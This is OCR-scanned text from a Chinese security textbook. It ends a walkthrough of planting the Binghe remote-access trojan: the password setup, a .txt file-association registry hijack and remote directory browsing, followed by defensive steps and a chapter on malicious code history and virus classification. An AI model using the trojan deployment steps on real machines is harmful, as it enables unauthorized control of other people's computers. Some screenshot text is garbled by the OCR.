程序 win32. exe 进行 配置 ,并 填写 访问 服务 器 端 程序 的 口令 ,这 里 设置 为 "1234567890”, 如 
图 5-14 所 示 。 
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冰河 Y8-2[ 渤 仙 专 版 ] 
文件 [EF] 。 护 回 区 ] 。 设置 [Eg] 。 帮 且 加 


TEE 
当前 连接 : [Locumost 了 MD:Fes ” 沪 加 DS: 厂 应 用 [8] 
全 文人 管理 器 | 又 命令 控制 台 | 


I 文件 大 小 全 忆 ) | 晤 后 更 新 时 间 


全 :| SISTED 习 音 伍 : Pm 


进程 名 称 : [randovs 访问 口令: 站 234567850 


选择 配置 的 文件 
图 5-14 设置 “冰河 ”服务 器 配置 


单 击 “ 确 定 ” 按 钮 以 后 ,就 将 “冰河 ”的 服务 器 种 到 某 一 人 台 主 机 上 了 。 执 行 完 win32. exe 
文件 以 后 ,系统 没有 任何 反应 ,其 实 已 经 更 改 了 注册 表 , 并 将 服务 器 端 程序 和 文本 文件 进行 
了 关联 , 当 用 户 双击 一 个 扩展 名 为 txt 的 文件 的 时 候 ,就 会 自动 执行 冰河 服务 器 端 程序 。 当 
计算 机 感染 了 “冰河 ”以 后 ,查看 被 修改 后 的 注册 表 , 如 图 5-15 所 示 。 


EE 注册 表 编 辑 器 


二 | | 名 称 类 型 数据 
国 蒜 认 REG_Sz CMVWWINNTI5ystem3245YSEXPLR.EXE %1 


田 息 | TxCTx.TransactionContext 
a TxCTx,TransactionContextEx 
日 国 btfie 


5-15 ”查看 注册 表 
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没有 中 冰河 的 情况 下 ,该 注册 表 项 应 该 是 使 用 Notepad. exe 文件 来 打开 txt 文件 ,而 图 
中 的 SYSEXPLR. EXE 其 实 就 是 “冰河 ”的 服务 器 端 程序 。 

目标 主机 中 了 冰河 以 后 ,可 以 利用 客户 端 程序 来 连接 服务 器 端 程序 。 在 客户 端 添 加 主 
机 的 地 址 信息 ,这 里 的 密码 是 就 是 刚才 设置 的 密码 “1234567890”, 单 击 “ 确 定 ” 按 钮 之 后 , 开 
始 与 目标 机 连接 ,连接 成 功 后 就 进入 目标 机 器 ,同时 可 以 查看 计算 机 的 基本 信息 以 及 对 方 计 
算 机 的 目录 列表 。 在 图 5-16 的 界面 上 , 单 击 “ 命 令 控 制 台 ”就 可 以 对 目标 机 进行 任何 操作 。 


订 河 8.2 [ 选 仙 专 版 ] 
文件 [] 。 仿 辑 [2】 ”设置 [6】 ”帮助 和] 


TPE 
| Se :ew 浪人 S: 用 
局 文件 首 理 器 | 又 命令 控制 台 | 

ER 


国 Docments snd 5. 
国 zmetpwb 


2000-1-10 12:00: 
arcsetup. exe 2000-1-10 12:00: 时 
AVTOEXEC. BAT 2002-10-19 5:08: 
boot ini 2002-10-19 4:56 | 
bootfont. bin 2000-1-10 12:00: 
CONFIG. STS 2002-10-19 5:08: 


FindPass. exe 2001-11-30 14:1: 宫 


图 5-16 查看 对 方 的 目录 列表 


防范 方法 : 

(1) 下 载 并 安装 最 新 的 补丁 程序 。 

(2) 用 下 载 了 最 新 病毒 库 的 杀 病 毒 工具 对 系统 进行 查 杀 。 

(3) 随时 注意 监控 检查 开放 的 端口 .连接 ,观察 特定 的 目录 ,检查 注册 表 和 启动 组 。 检 
查 特定 的 目录 时 ,应 经 常 观察 位 于 c:\、c:\windows\、c:\windows\system 这 三 个 目录 下 的 
文件 ,查看 是 否 发 现 特洛伊 木马 、 击 键 程序 的 记录 文件 ,如 果 存 在 只 有 文件 名 没有 图 标的 可 
执行 程序 ,应 该 把 它们 删除 ,然后 再 用 杀毒 软件 进行 认真 的 清理 。 查 看 注册 表 的 时 候 ,要 特 
别 注意 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrenVersion 
和 HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version 下 所 有 以 
“Run” 开 头 的 键 值 名 ,检查 其 下 有 没有 可 疑 的 文件 名 。 如 果 有 ,就 需要 删除 相应 的 键 值 ,再 
删除 相应 的 应 用 程序 。 启 动 组 对 应 的 文件 夹 为 C:\windows\startmenu\programs\startup， 
在 注册 表 中 的 位 置 为 : HKEY_CURRENT _ USER \ Software\ Microsoft\ Windows\ 
CurrentVersion\ Explorer\ Shell Folders Startup=“C:\windows\startmenu\programs\ 
startup”, 应 经 常 检查 是 否 有 可 疑 程序 驻 留 。 

(4) 使 用 防火 墙 。 
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本 章 学 习 要 求 : 

。 了解 恶意 代码 研究 的 必要 性 。 

。 了解 恶意 代码 的 发 展 史 和 恶意 代码 长 期 存在 的 原因 。 

。 熟悉 恶意 代码 的 实现 机 理 。 

。 熟悉 恶意 代码 定义 和 攻击 方法 。 

。 掌握 恶意 代码 生存 技术 、 隐 藏 技术 。 

。 了 解 计算 机 病毒 的 定义 。 

。 掌握 木马 病毒 的 运行 机 制 和 定义 。 

。 掌握 网 络 蠕虫 的 定义 和 危害 。 

。 熟悉 恶意 代码 防范 方法 ; 基于 主机 的 检测 方法 和 基于 网 络 的 检测 方法 。 


6.1 恶意 代码 概述 


恶意 代码 是 指 计算 机 程序 代码 ,可 以 被 执行 完成 特定 功能 。 任 何事 物 都 有 正 反 两 面 ,人 
类 发 明 的 所 有 工具 既 可 造福 也 可 作孽 ,这 完全 取决 于 使 用 工具 的 人 。 计 算 机 程序 也 不 例外 ， 
软件 工程 师 们 编写 了 大 量 的 有 用 软件 (操作 系统 、 应 用 系统 和 数据 库 系 统 等 ) 的 同时 ,黑客 们 
也 在 编写 扰乱 社会 和 他 人 的 计算 机 程序 ,这 些 代码 统称 为 恶意 代码 (Malicious Codes)。 


6.1.1 研究 恶意 代码 的 必要 性 


在 Internet 安全 事件 中 ,恶意 代码 造成 的 经 济 损失 占有 最 大 的 比例 。 恶 意 代码 主要 包括 
计算 机 病毒 (Virus) .蠕虫 (Worm) 、 木 马 程序 (Trojan Horse) 后门 程 序 (Backdoor) .逻辑 炸弹 
(Logic Bomb) 等 。 与 此 同时 ,恶意 代码 成 为 信息 战 、 网 络 战 的 重要 手段 。 日 益 严重 的 恶意 代码 
问题 ,不仅 使 企业 及 用 户 蒙受 了 巨大 经 济 损失 ,而 且 使 国家 的 安全 面临 着 严重 威胁 。 目 前 国际 
上 一 些 发 达 国 家 (如 美国 德国 ,日 本 等 ) 均 已 在 该 领域 投入 大 量 资金 和 人 力 进 行 研究 ,并 取得 
了 一 定 的 技术 成 果 。 据 报道 ,1991 年 的 海湾 战争 ,美国 在 伊拉克 从 第 三 方 国 家 购买 的 打印 机 
里 植 人 了 可 远程 控制 的 恶意 代码 ,在 战争 打响 前 ,使 伊拉克 整个 计算 机 网 络 管理 的 雷达 预警 系 
统 全 部 瘫痪 ,这 是 美国 第 一 次 公开 在 实战 中 使 用 恶意 代码 攻击 技术 取得 的 重大 军事 利益 。 

恶意 代码 攻击 成 为 信息 战 、 网 络 战 最 重要 的 入 侵 手 段 之 一 。 一 个 典型 的 例子 是 在 电影 
《独立 日 } 中 ,美国 空军 对 外 星 飞船 进行 核 稻 炸 没有 效果 ,最 后 给 敌人 飞船 系统 注入 恶意 代 
码 ,使 敌人 飞船 的 保护 层 失效 ,从 而 拯救 了 地 球 , 从 中 可 以 看 出 恶意 代码 研究 的 重要 性 。 恶 
意 代码 问题 无 论 从 政治 上 ,经济 上 ,还 是 军事 上 .都 成 为 信息 安全 面临 的 首要 问题 。 有 恶意 代 
码 的 机 理 研 究 成 为 解决 恶意 代码 问题 的 必需 途径 ,只 有 掌握 当前 恶意 代码 的 实现 机 理 ,加 强 
对 未 来 恶意 代码 趋势 的 研究 ,才能 在 恶意 代码 问题 上 取得 先决 之 机 。 
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6.1.2 恶意 代码 的 发 展 史 


恶意 代码 经 过 20 多 年 的 发 展 ,破坏 性 、 种 类 和 感染 性 都 得 到 增强 。 随 着 计算 机 的 网 络 
化 程度 逐步 提高 ,网 络 传播 的 恶意 代码 对 人 们 日 常生 活 的 影响 越 来 越 大 。 

1988 年 11 月 泛滥 的 Morris 蠕虫 ,顷刻 之 间 使 得 6000 多 台 计 算 机 ( 占 当 时 Internet 上 
计算 机 总 数 的 10% 多 ) 竣 痪 ,造成 严重 的 后 果 , 并 因此 引起 世界 范围 内 关注 。 

1998 年 ,CIH 病毒 造成 数 十 万 台 计算 机 遭 到 破坏 。 

1999 年 ,Happy 99、Melissa 病毒 大 爆发 .Melissa 病毒 通过 E-mail 附件 快速 传播 而 使 
E-mail 服务 器 和 网 络 负载 过 重 , 它 还 将 敏感 的 文档 在 用 户 不 知情 的 情况 下 按 地 址 竹中 的 地 
址 发 送出 去 。 

2000 年 5 月 爆发 的 “ 爱 虫 "病毒 及 其 以 后 出 现 的 50 多 个 变种 病毒 ,是 近年 来 让 计算 机 
信息 界 付 出 极 大 代价 的 病毒 , 仅 一 年 时 间 就 感染 了 4000 多 万 台 计 算 机 ,造成 大 约 87 亿美 元 
的 经 济 损失 。 

2001 年 ,国家 计算 机 网 络 与 信息 安全 管理 办 公 室 与 公安 部 共同 主办 了 我 国 首 次 计算 机 
病毒 疫情 网 上 调查 工作 。 结 果 感 染 过 计算 机 病毒 的 用 户 高 达 73%, 其 中 ,感染 三 次 以 上 的 
用 户 又 占 59% 多 ,网 络 安全 存在 极 大 的 隐患 。 

2001 年 8 月 ,红色 代码 ?蠕虫 利 用 微软 Web 服务 器 IIS 4.0 或 5.0 中 Index 服务 的 安 
全 漏洞 ,攻破 目标 机 器 ,并 通过 自动 扫描 方式 传播 蠕虫 ,在 互联 网 上 大 规模 泛滥 。 

2003 年 ,SLammer 蠕虫 在 10min 内 导致 互联 网 90% 的 脆弱 主机 受到 感染 。 同 年 8 月 ， 
“冲击 波 ” 蠕 虫 爆发 ,8 天 内 导致 全 球 计算 机 用 户 损 失 高 达 20 亿美 元 之 多 。 

2004 一 2006 年 ,振荡 波 蠕虫 .爱情 后 门 , 波 特 后 门 等 恶意 代码 利用 电子 邮件 和 系统 漏洞 
对 网 络 主机 进行 疯狂 传播 ,给 国家 和 社会 造成 了 巨大 的 经 济 损失 。 

2007 一 2011 年 ,各 种 网 页 挂 马 、 钓 鱼网 站 频频 出 现 , 给 很 多 网 站 和 网 民 造 成 巨大 损失 。 

目前 ,恶意 代码 问题 已 成 为 信息 安全 需要 解决 的 .迫在眉睫 的 、 刻 不 容 缓 的 安全 问题 。 
图 6-1 显示 了 过 去 30 年 主要 恶意 代码 事件 。 
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恶意 代码 从 20 世纪 80 年 代 发 展 至 今 体现 出 以 下 三 个 主要 特征 。 

(1) 恶意 代码 日 趋 复杂 和 完善 。 从 非常 简单 的 、 感 染 游戏 的 Apple 了 病毒 发 展 到 复杂 
的 操作 系统 内 核 病毒 再 到 今天 主动 式 传播 和 破坏 性 极 强 的 蠕虫 ,恶意 代码 在 快速 传播 机 制 
和 生存 性 技术 研究 方面 取得 了 很 大 的 成 功 。 

(2) 恶意 代码 编制 方法 及 发 布 速 度 更 快 。 恶 意 代 码 刚 出 现时 发 展 较 慢 , 但 是 随 着 网 络 
飞速 发 展 ,Internet 成 为 恶意 代码 发 布 并 快速 蔓延 的 平台 。 特 别 是 在 过 去 5 年 里 ,不 断 涌现 
的 恶意 代码 证 实 了 这 一 点 。 

(3) 从 病毒 到 电子 邮件 蠕虫 ,再 到 利用 系统 漏洞 主动 攻击 的 恶意 代码 。 恶 意 代码 的 早 
期 ,大 多 数 攻击 行为 是 由 病毒 和 受 感染 的 可 执行 文件 引起 的 。 然 而 ,在 过 去 5 年 里 ,利用 系 
统 和 网 络 的 脆弱 性 进行 传播 和 感染 的 方式 开创 了 恶意 代码 发 展 的 新 纪元 。 


6.1.3 恶意 代码 长 期 存在 的 原因 


恶意 代码 之 所 以 长 期 存在 ,是 因为 在 计算 机 技术 飞速 发 展 的 同时 ,并 未 使 系统 的 安全 性 
得 到 增强 ,技术 进步 带 来 的 安全 增强 能 力 最 多 只 能 弥补 由 于 应 用 环境 的 复杂 性 带 来 的 安全 
威胁 的 增长 程度 。 不 但 如 此 ,计算 机 新 技术 的 出 现 还 很 有 可 能 使 计算 机 系统 的 安全 变 得 比 
以 往 更 加 脆弱 。 

恶意 代码 的 一 个 主要 特征 是 其 针对 性 (针对 特定 的 脆弱 点 ), 这 种 针对 性 充分 说 明了 恶 
意 代 码 正 是 利用 软件 的 脆弱 性 实现 其 恶意 目的 的 。 造 成 广泛 影响 的 1988 年 Morris 蠕虫 事 
件 ,就 是 利用 邮件 系统 的 脆弱 性 作为 其 人 侵 的 最 初 突破 点 的 。 

尽管 人 们 为 保证 系统 和 网 络 基础 设施 的 安全 做 了 诸多 努力 ,但 遗憾 的 是 ,系统 的 脆弱 性 
终究 不 可 避免 。 各 种 安全 措施 只 能 减少 ,但 不 能 杜绝 系统 的 脆弱 性 ; 而 测试 手段 也 只 能 证 
明 系 统 存在 脆弱 性 , 却 无 法 证 明 系统 不 存在 脆弱 性 。 而 且 , 为 满足 实际 需要 ,信息 系统 的 规 
模 越 来 越 大 ,安全 脆弱 性 的 问题 会 越 来 越 突出 。 随 着 这 些 脆弱 性 逐渐 被 发 现 , 不 断 会 有 针对 
这 些 脆 弱 性 的 新 的 恶意 代码 出 现 。 总 而 言 之 ,在 信息 系统 的 层次 结构 中 ,包括 从 底层 的 操作 
系统 到 上 层 的 网 络 应 用 在 内 的 各 个 层次 都 存在 着 许多 不 可 避免 的 安全 问题 和 安全 脆弱 性 。 
而 这 些 安全 脆弱 性 的 不 可 避免 ,直接 导致 了 恶意 代码 的 必然 存在 。 


6.2 计算 机 病毒 


6.2.1 计算 机 病毒 概述 


计算 机 病毒 名 称 的 由 来 借用 了 生物 学 中 的 病毒 概念 , 它 是 一 组 具有 自我 复制 、 传 播 能 力 
的 程序 代码 。 它 常 依附 在 计算 机 的 文件 中 ,如 可 执行 文件 或 Word 文档 中 。 当 文件 被 复制 
或 从 一 个 用 户 传送 到 另 一 个 用 户 时 ,它们 就 随同 文件 一 起 蔓延 开 来 。 除 了 复制 能 力 外 , 某 些 
计算 机 病毒 还 有 其 他 一 些 共同 特性 : 一 个 被 污染 的 程序 能 够 传送 病毒 载体 。 当 看 到 病毒 载 
体 似乎 仅仅 表现 在 文字 和 图 像 上 时 ,它们 可 能 也 已 毁坏 了 文件 .格式 化 了 硬盘 驱动 或 引发 了 
其 他 类 型 的 灾害 。 若 病毒 不 寄生 于 一 个 污染 程序 , 它 仍然 能 通过 占据 存储 空间 给 被 攻击 者 
带 来 麻烦 ,并 降低 计算 机 的 全 部 性 能 。 可 以 从 不 同 的 角度 给 出 计算 机 病毒 的 定义 : 一 种 定 
义 是 通过 磁盘 、 磁 带 和 网 络 等 作为 媒介 传播 扩散 ,能 “传染 "其 他 程序 的 程序 ; 另 一 种 是 能 够 
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实现 自身 复制 且 借 助 一 定 的 载体 存在 的 具有 潜伏 性 、 传 染 性 和 破坏 性 的 程序 。 还 有 其 他 的 
定义 : 病毒 是 一 种 人 为 制造 的 程序 , 它 通过 不 同 的 途径 潜伏 或 寄生 在 存储 媒体 (如 磁盘 、 内 
存 ) 或 程序 里 , 当 某 种 条 件 或 时 机 成 熟 时 , 它 会 自行 复制 并 传播 ,使 计算 机 的 资源 受到 不 同 程 
度 的 破坏 等 。 这 些 说 法 在 某 种 意义 上 借用 了 生物 学 病毒 的 概念 ,计算 机 病毒 同 生物 病毒 的 
相似 之 处 是 能 够 侵入 计算 机 系统 和 网 络 , 危 害 正常 工作 的 “病原 体 ”。 它 能 够 对 计算 机 系统 
进行 各 种 破坏 ,同时 能 够 自我 复制 ,具有 传染 性 。 所 以 ,计算 机 病毒 就 是 能 够 通过 某 种 途径 
潜伏 在 计算 机 存储 介质 (或 程序 ) 里 , 当 达 到 某 种 条 件 时 即 被 激活 的 具有 对 计算 机 资源 进行 
破坏 作用 的 一 组 程序 或 指令 集合 。 


6.2.2 计算 机 病毒 分 类 


根据 多 年 对 计算 机 病毒 的 研究 ,按照 科学 的 .系统 的 .严密 的 方法 ,计算 机 病毒 可 以 按 多 
种 方式 进行 分 类 : 按照 计算 机 病毒 存在 的 媒体 进行 分 类 ,按照 计算 机 病毒 传染 的 方法 进行 
分 类 ,根据 病毒 的 破坏 能 力 进行 分 类 ,根据 病毒 特有 的 算法 进行 分 类 , 按 病毒 入 侵 的 方式 分 
类 和 按照 传播 媒介 分 类 。 

1. 按照 计算 机 病毒 存在 的 媒体 进行 分 类 

根据 病毒 存在 的 媒体 ,病毒 可 以 划分 为 网 络 病毒 ,文件 病毒 .引导 型 病毒 。 网 络 病毒 通过 
计算 机 网 络 传播 感染 网 络 中 的 可 执行 文件 ; 文件 病毒 感染 计算 机 中 的 文件 (如 : . com,. exe， 
. doc 文件 等 ); 引导 型 病毒 感染 启动 扇 区 (Boot) 和 硬盘 的 系统 引导 扇 区 (MBR)。 还 有 这 三 
种 情况 的 混合 型 ,例如 : 多 型 病毒 (文件 和 引导 型 ) 感 染 文件 和 引导 扇 区 两 种 目标 ,这 样 的 病 
毒 通常 都 具有 复杂 的 算法 ,它们 使 用 非常 规 的 办 法 侵入 系统 ,同时 使 用 了 加 密 和 变形 算法 。 

2. 按照 计算 机 病毒 传染 的 方法 进行 分 类 

根据 病毒 传染 的 方法 可 分 为 驻 留 型 病毒 和 非 驻 留 型 病毒 。 驻 留 型 病毒 感 当 计 算 机 后 ， 
把 自身 的 内 存 驻 留 部 分 放 在 内 存 (RAM) 中 ,这 一 部 分 程序 挂 接 系统 调用 并 合并 到 操作 系统 
中 去 ,并 处 于 激活 状态 ,一 直到 关机 或 重新 启动 。 非 驻 留 型 病毒 在 得 到 机 会 激活 时 并 不 感染 
计算 机 内 存 ,一 些 病毒 在 内 存 中 留 有 小 部 分 ,但 是 并 不 通过 这 一 部 分 进行 传染 ,这 类 病毒 也 
被 称 为 非 驻 留 型 病毒 。 

3. 根据 病毒 的 破坏 能 力 进行 分 类 

根据 病毒 的 破坏 能 力 进行 分 类 ,可 以 分 为 以 下 三 种 。 

(1) 良性 计算 机 病毒 。 良 性 计算 机 病毒 是 指 其 不 包含 立即 对 计算 机 系统 产生 直接 破坏 
作用 的 代码 。 良 性 计算 机 病毒 取得 系统 控制 权 后 ,会 导致 整个 系统 运行 效率 降低 ,系统 可 用 
内 存 总 数 减少 , 某 些 应 用 程序 不 能 运行 。 

(2) 恶性 计算 机 病毒 。 恶 性 计算 机 病毒 就 是 指 在 其 代码 中 包含 损伤 和 破坏 计算 机 系统 
的 操作 ,在 其 传染 或 发 作 时 会 对 系统 产生 直接 的 破坏 作用 。 这 类 病毒 是 很 危险 的 ,应 当 注 意 

(3) 极 恶性 计算 机 病毒 。 这 类 病毒 删除 程序 、 破 坏 数据 、 清 除 系统 内 存 区 和 操作 系统 中 
的 重要 信息 。 这 些 病毒 对 系统 造成 的 危害 ,并 不 是 本 身 的 算法 中 存在 危险 的 调用 ,而 是 当 它 
们 传染 时 会 引起 无 法 预料 的 和 灾难 性 的 破坏 。 由 病毒 引起 其 他 的 程序 产生 的 错误 也 会 破坏 
文件 和 扇 区 。 
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4. 根据 病毒 特有 的 算法 进行 分 类 

根据 病毒 特有 的 算法 ,可 以 分 为 以 下 5 类 。 

(1) 伴随 型 病毒 。 这 一 类 病毒 并 不 改变 文件 本 身 , 它 们 根据 算法 产生 EXE 文件 的 伴随 
体 , 具 有 同样 的 名 字 和 不 同 的 扩展 名 (. com) ,例如 : xcopy. exe 的 伴随 体 是 xcopy. com。 病 
毒 把 自身 写 和 人. com 文件 并 不 改变 . exe 文件 , 当 DOS 加 载 文件 时 ,伴随 体 优 先 被 执行 到 ,再 
由 伴随 体 加 载 执行 原来 的 . exe 文件 。 

(2)“ 蠕 虫 "型 病毒 。 该 病毒 通过 计算 机 网 络 传播 ,不 改变 文件 和 资料 信息 ,利用 网 络 从 
一 台 机 器 的 内 存 传播 到 其 他 机 器 的 内 存 , 将 自身 的 病毒 通过 网 络 发 送出 去 。 有 时 它们 会 存 
在 于 系统 中 ,一 般 除了 占用 内 存 外 并 不 占用 其 他 资源 。 

(3) 寄生 型 病毒 。 除 了 伴随 型 和 “蠕虫 ”型 外 ,其 他 病毒 均 可 称 为 寄生 型 病毒 ,它们 依附 
在 系统 的 引导 扇 区 或 文件 中 ,通过 系统 的 功能 进行 传播 。 

(4) 诡秘 型 病毒 。 它 们 一 般 不 直接 修改 DOS 中 断 和 扇 区 数据 ,而 是 通过 设备 技术 和 文 
件 缓冲 区 等 DOS 内 部 修改 ,不 易 看 到 资源 ,使 用 比较 高 级 的 技术 ,利用 DOS 空闲 的 数据 区 
进行 工作 。 

(5) 变型 病毒 (又 称 幽灵 病毒 ) 。 这 一 类 病毒 使 用 一 个 复杂 的 算法 ,使 自己 每 传播 一 份 
都 具有 不 同 的 内 容 和 长 度 。 它 们 一 般 的 做 法 是 : 病毒 由 一 段 混 有 无 关 指 令 的 解码 算法 和 被 
变化 过 的 病毒 体 组 成 。 

5. 按 病毒 入 侵 的 方式 分 类 

按 病毒 人 侵 的 方式 可 以 分 为 源 代 码 嵌 入 攻击 型 病毒 .代码 取代 攻击 型 病毒 .系统 修改 型 
病毒 和 外 壳 附 加 型 病毒 4 种 。 

(1) 源 代码 嵌入 攻击 型 病毒 。 源 代码 嵌入 攻击 型 病毒 就 是 指 该 病毒 人 侵 的 主要 是 高 级 
语言 的 源 程序 ,病毒 是 在 源 程序 编译 之 前 插入 病毒 代码 ,最 后 随 源 程序 一 起 被 编译 成 可 执行 
文件 ,这 样 刚 生成 的 文件 就 是 带 毒 文件 。 当 然 这 类 文件 是 极 少数 ,因为 这 些 病毒 开发 者 不 可 
能 轻易 得 到 那些 软件 开发 公司 编译 前 的 源 程序 ,况且 这 类 入 侵 的 方式 难度 较 大 ,需要 病毒 开 
发 者 达到 非常 专业 的 编程 水 平 。 

(2) 代码 取代 攻击 型 病毒 。 代 码 取 代 攻 击 型 病毒 主要 是 由 它 自身 的 病毒 代码 取代 某 个 
入 侵 程 序 的 整个 或 部 分 模块 ,这 类 病毒 也 比较 少见 , 它 主要 是 攻击 特定 的 程序 ,针对 性 较 强 ， 
但 是 不 易 被 发 现 , 清 除 起 来 也 比较 困难 。 

(3) 系统 修改 型 病毒 。 系 统 修改 型 病毒 主要 是 用 自身 程序 覆盖 或 修改 系统 中 的 某 些 文 
件 来 调用 或 替代 操作 系统 中 的 部 分 功能 。 该 类 病毒 由 于 是 直接 感染 系统 ,危害 较 大 ,也 是 最 
为 多 见 的 一 种 病毒 类 型 ,多 为 文件 型 病毒 。 

(4) 外 壳 附 加 型 病毒 。 外 壳 附 加 型 病毒 通常 是 将 病毒 附加 在 正常 程序 的 头 部 或 尾部 ， 
相当 于 给 程序 添加 了 一 个 外 壳 ,在 被 感染 的 程序 执行 时 ,病毒 代码 先 被 执行 ,然后 才 将 正常 
程序 调和 人 内存。 目前 大 多 数 文件 型 的 病毒 属于 这 一 类 。 

6. 按 传播 媒介 分 类 

按照 计算 机 病毒 的 传播 媒介 来 分 类 ,可 以 分 为 单机 病毒 和 网 络 病毒 两 种 。 

(1) 单机 病毒 。 单 机 病毒 的 载体 是 磁盘 或 U 盘 , 常 见 的 是 病毒 从 移动 磁盘 传人 硬盘 ， 
感染 系统 ,然后 再 传染 其 他 移动 磁盘 ,又 传染 其 他 系统 。 
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(2) 网 络 病毒 。 网 络 病毒 的 传播 媒介 不 再 是 移动 式 载体 ,而 是 网 络 通道 ,这 种 病毒 的 传 
染 能 力 更 强 , 破 坏 力 更 大 。 
总 之 ,计算 机 病毒 的 分 类 方法 有 很 多 ,说 法 也 不 一 ,同一 种 病毒 可 从 不 同 角 度 进行 分 类 。 


6.2.3 计算 机 病毒 的 命名 规则 


只 要 掌握 一 些 病毒 的 命名 规则 ,就 能 通过 杀毒 软件 的 报告 中 出 现 的 病毒 名 来 判断 该 病 
毒 的 一 些 共 有 的 特性 ,网 络 病毒 命名 的 一 般 格式 为 : 一 病毒 前 级. 二 病毒 名 二 . 二 病毒 
后 级 二。 

病毒 前 级 是 指 一 个 病毒 的 种 类 , 它 是 用 来 区 别 病毒 的 种 族 分 类 的 。 不 同 种 类 的 病毒 ,其 
前 级 也 是 不 同 的 。 比 如 常见 的 木马 病毒 的 前 级 是 Trojan, 蠕 虫 病毒 的 前 级 是 Worm 等 。 病 
毒 名 是 指 一 个 病毒 的 家 族 特征 ,是 用 来 区 别 和 标识 病毒 家 族 的 ,如 以 前 著名 的 CIH 病毒 的 
家 族 名 都 是 统一 的 “CIH”, 振 荡 波 蠕 虫 病毒 的 家 族 名 是 “Sasser”。 

病毒 后 级 是 指 一 个 病毒 的 变种 特征 ,是 用 来 区 别 某 个 具体 的 家 族 病毒 的 某 种 变种 的 ,一 
般 都 采用 英文 中 的 26 个 字母 来 表示 ,如 Worm. Sasser.b 就 是 指 振荡 波 蠕虫 病毒 的 变种 B， 
因此 一 般 称 为 “振荡 波 B 变种 ”或 者 “振荡 波 变 种 B"”。 如 果 该 病毒 变种 非常 多 ,可 以 采用 数 
字 与 字母 混合 来 表示 变种 标识 。 下 面 给 出 一 些 常 见 的 病毒 命名 前 级 的 解释 (针对 目前 使 用 
最 多 的 Windows 操作 系统 ) 。 

1. 系统 病毒 

系统 病毒 的 前 级 为 : Win32、PE、Win95、W32、W95 等 。 这 些 病毒 的 一 般 共 有 的 特性 是 
可 以 感染 Windows 操作 系统 的 * . exe 和 *. dll 文件 ,并 通过 这 些 文件 进行 传播 ,如 CIH 
病毒 。 

2. 蠕虫 病毒 

蠕虫 病毒 的 前 级 是 Worm。 这 种 病毒 的 共有 特性 是 通过 网 络 或 者 系统 漏洞 进行 传播 ， 
很 大 部 分 的 蠕虫 病毒 都 有 向 外 发 送 带 毒 邮件 、 阻 塞 网 络 的 特性 ,如 冲击 波 ( 阻 塞 网 络 )、 小 邮 
差 (发 带 毒 邮件 ) 等 。 

3. 木马 病毒 .黑客 病毒 

木马 病毒 的 前 级 是 Trojan ,黑客 病毒 前 级 名 一 般 为 Hack。 木 马 病毒 的 共有 特性 是 通 
过 网 络 或 者 系统 漏洞 进入 用 户 的 系统 并 隐藏 ,然后 向 外 界 泄漏 用 户 的 信息 ; 黑客 病毒 则 有 
一 个 可 视 的 界面 ,能 对 用 户 的 计算 机 进行 远程 控制 。 木 马 、 黑 客 病毒 往往 是 成 对 出 现 的 , 即 
木马 病毒 负责 侵入 用 户 的 计算 机 ,而 黑客 病毒 则 会 通过 该 木马 病毒 来 进行 控制 。 现 在 这 两 
种 类 型 越 来 越 趋向 于 整合 了 。 一 般 的 木马 如 QQ 消息 尾巴 木马 Trojan. QQ3344, 还 有 比较 
常见 的 针对 网 络 游戏 的 木马 病毒 如 Trojan. LMir. PSW. 60。 另 外 ,病毒 名 中 带 有 PSW 或 
者 PWD 之 类 的 一 般 都 表示 这 个 病毒 有 盗 取 密码 的 功能 (这 些 字母 一 般 都 为 “密码 ”的 英文 
“password” 的 缩写 ) 。 黑 客 病毒 程序 如 网 络 泉 雄 (Hack. Nether. Client) 等 。 

4. 脚本 病毒 

脚本 病毒 的 前 级 是 Script。 脚 本 病毒 的 共有 特性 是 使 用 脚本 语言 编写 ,通过 网 页 进行 
传播 的 病毒 ,如 红色 代码 (Script. Redlof)。 脚 本 病毒 还 会 有 如 下 前 级 : VBS、JS( 表 明 是 何 
种 脚本 编写 的 ) ,如 欢乐 时 光 (VBS. Happytime) ,十 四 日 (Js. Fortnight. c. s) 等 。 
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5. 宏 病 毒 

其 实 宏 病 毒 也 是 脚本 病毒 的 一 种 ,由 于 它 的 特殊 性 ,因此 在 这 里 单独 划分 为 一 类 。 宏 病 
毒 的 前 级 是 Macro, 第 二 前 缀 是 Word、Word97、Excel、Excel97 等 。 凡 是 只 感染 Word 1997 
及 以 前 版 本 Word 文档 的 病毒 采用 Word97 作为 第 二 前 级 ,格式 是 Macro. Word97; 凡是 只 
感染 Word 1997 以 后 版 本 Word 文档 的 病毒 采用 Word 作为 第 二 前 级 ,格式 是 Macro. 
Word; 凡是 只 感染 Excel 1997 及 以 前 版 本 Excel 文档 的 病毒 采用 Excel97 作为 第 二 前 级 ， 
格式 是 Macro. Excel97; 凡是 只 感染 Excel 1997 以 后 版 本 Excel 文档 的 病毒 采用 Excel 作 
为 第 二 前 级 ,格式 是 Macro. Excel, 以 此 类 推 。 该 类 病毒 的 共有 特性 是 能 感染 Office 系列 文 
档 , 然 后 通过 Office 文件 进行 传播 ,如 著名 的 美丽 莎 病毒 (Macro. Melissa) 。 

6. 后 门 病毒 

后 门 病毒 的 前 级 是 Backdoor。 该 病毒 的 共有 特性 是 通过 网 络 传播 ,给 系统 打开 后 门 ， 
给 用 户 的 计算 机 带 来 安全 隐患 。 

7. 病毒 种 植 程序 病毒 

这 类 病毒 的 共有 特性 是 运行 时 会 从 体内 释放 出 一 个 或 几 个 新 的 病毒 到 系统 目录 下 ,由 
释放 出 来 的 新 病毒 对 系统 进行 破坏 。 如 冰河 播种 者 (Dropper. BingHe2. 2C)、MSN 射手 
(Dropper. Worm. Smibag) 等 。 

8. 破坏 性 程序 病毒 

破坏 性 程序 病毒 的 前 级 是 Harm。 这 类 病毒 的 共有 特性 是 本 身 具 有 漂亮 的 图 标 来 诱惑 
用 户 点 击 , 当 用 户 点 击 这 类 病毒 时 ,病毒 便 会 直接 对 用 户 计 算 机 产生 破坏 。 如 格式 化 C 盘 
病毒 (Harm. formatC. f)、 杀手 命令 病毒 (Harm. Command. Killer) 等 。 

9. 玩笑 病毒 

玩笑 病毒 的 前 级 是 Joke, 也 称 恶作剧 病毒 。 这 类 病毒 的 共有 特性 是 本 身 具有 漂亮 的 图 
标 来 诱惑 用 户 点 击 , 当 用 户 点 击 这 类 病毒 时 ,病毒 会 做 出 各 种 破坏 操作 来 吓 路 用户 ,其 实 病 
